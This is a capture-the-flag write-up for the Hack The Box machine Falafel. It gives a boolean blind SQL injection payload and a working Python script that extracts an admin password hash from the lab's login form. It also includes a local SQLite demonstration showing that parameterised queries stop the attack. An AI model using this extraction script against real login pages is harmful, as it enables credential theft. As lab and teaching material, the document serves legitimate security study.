Blind SQLi : Falafel (HTB)

  • Script Description: the script automates extraction of the admin user's password hash (a 32-character MD5 digest) through a boolean-based blind SQL injection in the username parameter of the login form. The login page returns "Try again.." when the injected condition is false and "Wrong identification" when it is true, so each request leaks one bit and the hash is recovered one character at a time.

  • Payload : admin' and substring(password, 1, 1) = '0' -- -

  • Machine: HTB machine, Falafel

  • Script:

import requests

loginPage = 'http://10.10.10.73/login.php'
MD5Characters = "0123456789abcdef"   # hex alphabet of an MD5 digest
extractedHash = ''
session = requests.Session()          # reuse one connection for the ~500 requests

# Loop 32 times - length of the MD5 hash
for i in range(1, 33):
    # Loop over the MD5 character set, brute forcing the current hash character
    for char in MD5Characters:
        # injection into the username parameter; the password field is irrelevant
        parameters = {'username': "admin' and substring(password, " + str(i) + ", 1) = '" + char + "' -- -",
                      'password': ''}
        # save the response into an object
        response = session.post(loginPage, data=parameters)
        # getting the html content from the response object
        html = response.text
        # Check BlindSQLi cases:
        # 1 - "Try again.." case: the false case (wrong hash char, so we skip this char)
        # 2 - otherwise the application responds with "Wrong identification", which means the
        #     username matched, so the injected char is the one at this position of the hash
        if html.find("Try again..") != -1:
            continue
        print("[+] Current Position is %d and the Extracted Char is %s " % (i, char))
        extractedHash += char
        break
    else:
        # No candidate matched: the response text changed or a request failed, so stop
        # instead of silently shifting later characters into the wrong positions
        print("[-] No character matched at position %d, aborting" % i)
        break
print("[++] The hash of the admin user is : " + extractedHash)
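To see why the payload works as a one-bit oracle without touching the target, here is an added, self-contained example (not part of the original page or of the Falafel machine) that rebuilds the login check against an in-memory SQLite table, runs the same character-by-character extraction against it, and then shows that a parameterised query leaves the attacker with nothing. The table, the made-up password "example-secret" and the response strings (copied from the script's comments) are all assumptions of this example; SQLite spells the string function substr(), where the page's payload uses MySQL's substring().

```python
import hashlib
import sqlite3

# Constructed sample data for this example: one admin row whose password hash
# is the MD5 of a made-up secret. Only the 32-hex-character digest matters.
ADMIN_HASH = hashlib.md5(b"example-secret").hexdigest()
MD5_CHARSET = "0123456789abcdef"


def make_db():
    """In-memory stand-in for the application's users table (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (?, ?)", ("admin", ADMIN_HASH))
    return conn


def vulnerable_login(conn, username, password):
    """Login check with the username concatenated into SQL (the flaw the script abuses).

    The two failure messages are the ones the script keys on: no matching row
    gives "Try again..", a matching row with a wrong password gives
    "Wrong identification". That difference is the oracle.
    """
    query = f"SELECT password FROM users WHERE username = '{username}'"
    row = conn.execute(query).fetchone()
    if row is None:
        return "Try again.."
    if row[0] != hashlib.md5(password.encode()).hexdigest():
        return "Wrong identification"
    return "Welcome"


def safe_login(conn, username, password):
    """Same logic with a bound parameter: the injected text is compared as a literal."""
    row = conn.execute("SELECT password FROM users WHERE username = ?", (username,)).fetchone()
    if row is None:
        return "Try again.."
    if row[0] != hashlib.md5(password.encode()).hexdigest():
        return "Wrong identification"
    return "Welcome"


def hash_char_is(login, position, char):
    """Ask the oracle whether the hash character at `position` (1-based) equals `char`."""
    # Same shape as the page's payload; SQLite spells the function substr().
    payload = f"admin' and substr(password, {position}, 1) = '{char}' -- -"
    return login(payload, "") != "Try again.."


def extract_hash(login, length=32):
    """Recover the hash one character at a time; stop if no candidate matches."""
    extracted = ""
    for position in range(1, length + 1):
        for char in MD5_CHARSET:
            if hash_char_is(login, position, char):
                extracted += char
                break
        else:
            # Nothing matched: the oracle is gone (e.g. the query is parameterised)
            # or the response text changed. A partial result is safer than one
            # with later characters shifted into the wrong positions.
            break
    return extracted


def extract_from_vulnerable():
    """Run the attack against the concatenating login: returns the full hash."""
    conn = make_db()
    return extract_hash(lambda u, p: vulnerable_login(conn, u, p))


def extract_from_safe():
    """Run the same attack against the parameterised login: returns an empty string."""
    conn = make_db()
    return extract_hash(lambda u, p: safe_login(conn, u, p))


if __name__ == "__main__":
    print("vulnerable login leaks the hash:", extract_from_vulnerable() == ADMIN_HASH)
    print("parameterised login leaks:", repr(extract_from_safe()))
```

Worst case this costs 16 oracle queries per position, 512 for the whole digest; the for/else guard matters in practice because a single timeout or a changed error page would otherwise desynchronise every later character. Against the safe_login variant the first position already fails all 16 candidates, which is exactly what a fix should look like from the attacker's side.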
